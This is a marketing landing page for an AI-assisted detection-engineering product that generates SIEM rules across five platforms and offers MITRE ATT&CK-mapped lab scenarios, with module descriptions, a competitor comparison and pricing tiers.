Skip to main content
AI-POWERED DETECTION ENGINEERING

Write detection rules
across 5 SIEM platforms
in seconds.

Sigma · Splunk SPL · Elastic KQL · Sentinel KQL · Wazuh XML
55 hands-on lab scenarios mapping the full MITRE ATT&CK kill chain.

AGENTIC AI THREAT ALERT — AI agents can now exploit vulnerabilities faster than defenders can patch them. Train on 5 new AI-attack scenarios →
48%SAY #1 RISK
START FREE — 5 QUERIES/DAY →See what it does ↓
5SIEM Platforms
55Lab Scenarios
6AI Modules
$0To Start
soc-ai — Detection Engineer Module
// Modules

Six specialized AI modules.
One unified workflow.

Each module is purpose-built with domain-specific system prompts referencing real-world 2025–2026 threat intelligence.

Detection Engineer

Generate Sigma, Splunk SPL, Elastic KQL, Sentinel KQL, and Wazuh XML rules from natural language threat descriptions.

CORE

Vulnerability Analyzer

Assess CVEs, map attack surfaces, and generate remediation playbooks with CVSS scoring and exploit analysis.

ANALYSIS

Incident Responder

Build IR playbooks, containment checklists, and forensic analysis workflows for active incidents.

RESPONSE

Log Parser

Paste raw logs — Windows Event, Syslog, firewall, proxy — and get instant IOC extraction and anomaly detection.

FORENSICS

SIEM Translator

Convert detection rules between any two SIEM platforms instantly. Sigma ↔ Splunk ↔ Elastic ↔ Sentinel ↔ Wazuh.

CONVERT

Learn Mode

Interactive cybersecurity tutor covering MITRE ATT&CK, threat hunting, detection logic, and SOC workflows.

EDUCATION
// Platforms

One prompt. Five outputs.

Describe a threat in plain English. Get production-ready detection rules for every major SIEM platform.

Sigma
Splunk SPL
Elastic KQL
Sentinel KQL
Wazuh XML
// Hands-on Lab

55 scenarios.
Real threats.
Real logs.

Practice detection engineering against scenarios mapping the full MITRE ATT&CK kill chain — from initial access to exfiltration, including 2026-current AI deepfake vishing.

15Free Scenarios
19Intermediate
16Advanced
FREEPhishing Email — Macro-Enabled PayloadT1566.001
FREEBrute Force — RDP Login AttemptT1110.001
FREEPowerShell Download CradleT1059.001
PROKerberoasting via SPN RequestT1558.003
PROAI Deepfake Vishing CampaignT1598.004
PROSupply Chain — Compromised NPM PackageT1195.002
+ 44 more scenarios across all difficulty tiers
// Why SOC·AI

Layer it on top of what
you already use.

SOC·AI isn't replacing your training platform. It's the AI study partner that makes everything else click faster.

FeatureLetsDefendTryHackMeSOC·AI
AI-powered rule generation
Multi-SIEM output (5 platforms)
Hands-on lab scenarios✓ 55
Real-time log analysis
SIEM rule translation
Free tierLimitedLimited5 queries/day
Monthly price$39/mo$14/mo$29/mo
// Pricing

Start free. Upgrade when
you need unlimited.

No credit card required. 5 free queries every day — enough to experience the power of AI-driven detection engineering.

Free
$0

Start building detection skills today. Free account required.

  • 5 queries per day
  • All 6 AI modules
  • 15 Beginner lab scenarios
  • 5 SIEM platform outputs
START FREE →
Pro
$29/mo

Unlimited access for working SOC analysts and serious learners.

  • Unlimited queries
  • All 6 AI modules
  • All 55 lab scenarios
  • Intermediate + Advanced tiers
  • Priority response speed
GO PRO →
Student
$14/mo

Full Pro access at a student-friendly price. Verify with .edu email.

  • Everything in Pro
  • All 55 lab scenarios
  • .edu email verification
  • Build your detection portfolio
STUDENT ACCESS →
// Get started

Every analyst who writes
detection rules gets
promoted faster.

Stop copy-pasting rules you don't understand. Start engineering detections that actually catch threats.

CREATE YOUR ACCOUNT — IT'S FREE →

No credit card · 5 queries/day · Cancel anytime